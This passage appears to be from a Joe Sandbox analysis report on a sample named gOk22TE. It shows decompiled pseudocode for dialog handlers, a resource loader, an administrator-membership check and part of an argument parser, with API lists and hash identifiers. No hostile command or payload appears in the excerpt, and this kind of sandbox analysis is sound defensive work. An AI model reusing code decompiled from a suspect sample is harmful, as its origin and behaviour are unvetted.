                                                                                                                                                                                                                                                				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                                					if( *0x10e8590 == 0) {
                                                                                                                                                                                                                                                						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                                						 *0x10e8590 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 = _t8 - 1;
                                                                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                                					EndDialog(_a4, ??);
                                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                                				if(_t15 == 0) {
                                                                                                                                                                                                                                                					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                                					_t33 = _a4;
                                                                                                                                                                                                                                                					E010E43D0(_t33, _t16);
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t33, 0x834,  *0x10e8d4c);
                                                                                                                                                                                                                                                					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                                					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                                					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                                					 *0x10e88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                                					SetWindowLongA(_t34, 0xfffffffc, E010E30C0);
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t15 != 1) {
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_a12 != 6) {
                                                                                                                                                                                                                                                					if(_a12 != 7) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                                				goto L8;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 010E313B
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E314B
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000834), ref: 010E316A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 010E3176
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 010E317D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000834), ref: 010E3185
                                                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 010E3190
                                                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,010E30C0), ref: 010E31A3
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010E31CA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 7510c387d5a7dda01d7a4d5435f81e05a071290532b1a37e21b8795460e25e35
                                                                                                                                                                                                                                                • Instruction ID: 868cca3ca0114521a9a515a1a90f6e8cb281d551122273dbe03f66e42256abe5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7510c387d5a7dda01d7a4d5435f81e05a071290532b1a37e21b8795460e25e35
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C119031644221FFDB315B2A9C0CB5A3EF4BB4AB61F014699F9E5AF184DB7AC141C741
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                                			E010E18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				short _v12;
                                                                                                                                                                                                                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                				long _v24;
                                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				long _t45;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t51 = __esi;
                                                                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                                                                				_t23 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                                				_t25 =  *0x10e8128; // 0x2
                                                                                                                                                                                                                                                				_t45 = 0;
                                                                                                                                                                                                                                                				_v12 = 0x500;
                                                                                                                                                                                                                                                				_t50 = 2;
                                                                                                                                                                                                                                                				_v16.Value = 0;
                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                				if(_t25 != _t50) {
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					return E010E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(E010E17EE( &_v20) != 0) {
                                                                                                                                                                                                                                                					_t25 = _v20;
                                                                                                                                                                                                                                                					if(_v20 != 0) {
                                                                                                                                                                                                                                                						 *0x10e8128 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                                					L17:
                                                                                                                                                                                                                                                					CloseHandle(_v28);
                                                                                                                                                                                                                                                					_t25 = _v20;
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_push(__esi);
                                                                                                                                                                                                                                                					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                                					if(_t52 == 0) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						_pop(_t51);
                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                                						L15:
                                                                                                                                                                                                                                                						LocalFree(_t52);
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if( *_t52 <= 0) {
                                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                                							FreeSid(_v32);
                                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                                						_t50 = _t15;
                                                                                                                                                                                                                                                						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                                							_t45 = _t45 + 1;
                                                                                                                                                                                                                                                							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x10e8128 = 1;
                                                                                                                                                                                                                                                						_v20 = 1;
                                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010E18DD), ref: 010E181A
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010E182C
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: AllocateAndInitializeSid.ADVAPI32(010E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010E18DD), ref: 010E1855
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: FreeSid.ADVAPI32(?,?,?,?,010E18DD), ref: 010E1883
                                                                                                                                                                                                                                                  • Part of subcall function 010E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010E18DD), ref: 010E188A
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010E18EB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 010E18F2
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010E190A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 010E1918
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 010E192C
                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010E1944
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010E1964
                                                                                                                                                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 010E197A
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 010E199C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 010E19A3
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 010E19AD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                • Opcode ID: 80e2d97bf3786ef9420e872bd25f17e0daf74f81925c8ef8adf1ad34b0fcf30c
                                                                                                                                                                                                                                                • Instruction ID: 18180af1d8adf701d10543581c6c9c8e96629bb7e2e6510eb08b9fc8d0bd5f48
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80e2d97bf3786ef9420e872bd25f17e0daf74f81925c8ef8adf1ad34b0fcf30c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64312A71A00209EFDB609FA6DC88AAFBFFCFF48B50B104469F685E6154D73699048B61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E010E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				CHAR* _t14;
                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                				long _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t14 = __ecx;
                                                                                                                                                                                                                                                				_t11 = __edx;
                                                                                                                                                                                                                                                				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                                				_t16 = _t4;
                                                                                                                                                                                                                                                				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                                					if(_t16 == 0) {
                                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                                					FreeResource(_t15);
                                                                                                                                                                                                                                                					return _t16;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                • memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: TITLE$lenta
                                                                                                                                                                                                                                                • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                                • Opcode ID: bfc40be86e04a884c0228efe902c6a0e104b4eccbe080d047353a3c6f9c7120a
                                                                                                                                                                                                                                                • Instruction ID: 0267dae0dde62032dd08ee2b89d130583609c4b169708d62b2e147a521e80183
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfc40be86e04a884c0228efe902c6a0e104b4eccbe080d047353a3c6f9c7120a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17018F36340210BBE3301AAB6C0CF2B7EE8DB8DF61F054014FAC9DB144C966884487A2
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                                			E010E17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				short _v12;
                                                                                                                                                                                                                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                                				intOrPtr* _v28;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				signed int _t38;
                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t14 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                                				_v12 = 0x500;
                                                                                                                                                                                                                                                				_t37 = __ecx;
                                                                                                                                                                                                                                                				_v16.Value = 0;
                                                                                                                                                                                                                                                				_v28 = __ecx;
                                                                                                                                                                                                                                                				_t28 = 0;
                                                                                                                                                                                                                                                				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                                					_v20 = _t20;
                                                                                                                                                                                                                                                					if(_t20 != 0) {
                                                                                                                                                                                                                                                						 *_t37 = 0;
                                                                                                                                                                                                                                                						_t28 = 1;
                                                                                                                                                                                                                                                						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                                							_t37 = _t39;
                                                                                                                                                                                                                                                							 *0x10ea288(0, _v24, _v28);
                                                                                                                                                                                                                                                							_v20();
                                                                                                                                                                                                                                                							if(_t39 != _t39) {
                                                                                                                                                                                                                                                								asm("int 0x29");
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							FreeSid(_v24);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					FreeLibrary(_t36);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010E18DD), ref: 010E181A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010E182C
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(010E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010E18DD), ref: 010E1855
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?,?,?,?,010E18DD), ref: 010E1883
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,010E18DD), ref: 010E188A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                • Opcode ID: 27369c98905bec81fbbe303482e1932502d8d483f20f4879374e915ae9e7cdb3
                                                                                                                                                                                                                                                • Instruction ID: 4e0845ff00ce17e0037ad6bb8e5179883e3db37acc1bc3c7b70922bf7f5e1cef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27369c98905bec81fbbe303482e1932502d8d483f20f4879374e915ae9e7cdb3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52118431F00209EFDB149FA6DC4DABEBFF8EB48710F500169FA45E7240DA3599008790
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				struct HWND__* _t12;
                                                                                                                                                                                                                                                				int _t22;
                                                                                                                                                                                                                                                				struct HWND__* _t24;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t7 == 0) {
                                                                                                                                                                                                                                                					EndDialog(_a4, 2);
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                                                                					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                                					_t24 = _a4;
                                                                                                                                                                                                                                                					E010E43D0(_t24, _t12);
                                                                                                                                                                                                                                                					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t24, 0x838,  *0x10e9404);
                                                                                                                                                                                                                                                					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t11 == 1) {
                                                                                                                                                                                                                                                					_t22 = _a12;
                                                                                                                                                                                                                                                					if(_t22 < 6) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t22 <= 7) {
                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t22 != 0x839) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x10e91dc = 1;
                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 010E3490
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E349A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 010E34B2
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 010E34C4
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 010E34CB
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 010E34D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                                • Opcode ID: e0e494a564392efdeb0ee77f5a618f2c314b7ed6ebcd682f261f99eac31af47a
                                                                                                                                                                                                                                                • Instruction ID: a7e99374409ac04354dca54156f0a69900fde27d38e13228d6800bf226afe5fc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0e494a564392efdeb0ee77f5a618f2c314b7ed6ebcd682f261f99eac31af47a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01B1B9340114AFD72A5F6BD80C9AE3EE4FB49B51B008054FAC68F584CF36EA41CB81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E010E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				char _t32;
                                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                                				char* _t38;
                                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                                				char* _t44;
                                                                                                                                                                                                                                                				CHAR* _t52;
                                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                                				CHAR* _t59;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				CHAR* _t64;
                                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t60 = __edx;
                                                                                                                                                                                                                                                				_t16 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                                				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                                				_t65 = _a4;
                                                                                                                                                                                                                                                				_t44 = __edx;
                                                                                                                                                                                                                                                				_t64 = __ecx;
                                                                                                                                                                                                                                                				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                                					GetModuleFileNameA( *0x10e9a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_t17 =  *_t64;
                                                                                                                                                                                                                                                						if(_t17 == 0) {
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                                						 *_t65 =  *_t64;
                                                                                                                                                                                                                                                						if(_t21 != 0) {
                                                                                                                                                                                                                                                							_t65[1] = _t64[1];
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                                							L19:
                                                                                                                                                                                                                                                							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                                							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                                								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                                									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                                										goto L19;
